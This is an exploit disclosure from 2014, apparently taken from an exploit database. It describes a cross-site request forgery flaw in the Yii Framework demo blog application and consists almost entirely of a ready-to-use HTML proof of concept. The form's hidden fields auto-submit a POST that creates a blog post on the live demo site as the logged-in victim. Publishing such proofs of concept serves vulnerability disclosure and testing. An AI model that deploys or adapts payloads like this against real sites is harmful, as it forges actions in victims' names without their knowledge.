# Exploit Title: Yii Framework Blog Application CSRF Vulnerability
# Date: 3 Mar 2014
# Author: Christy Philip Mathew
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/
# Category:: web
# Tested on: Windows 8

Attacker will be able to create a post.

<html>

  <body>
    <form action="
http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">
      <input type="hidden" name="Post&#91;title&#93;" value="test" />
      <input type="hidden" name="Post&#91;content&#93;" value="test" />
      <input type="hidden" name="Post&#91;tags&#93;" value="test" />
      <input type="hidden" name="Post&#91;status&#93;" value="2" />
      <input type="hidden" name="yt0" value="Create" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>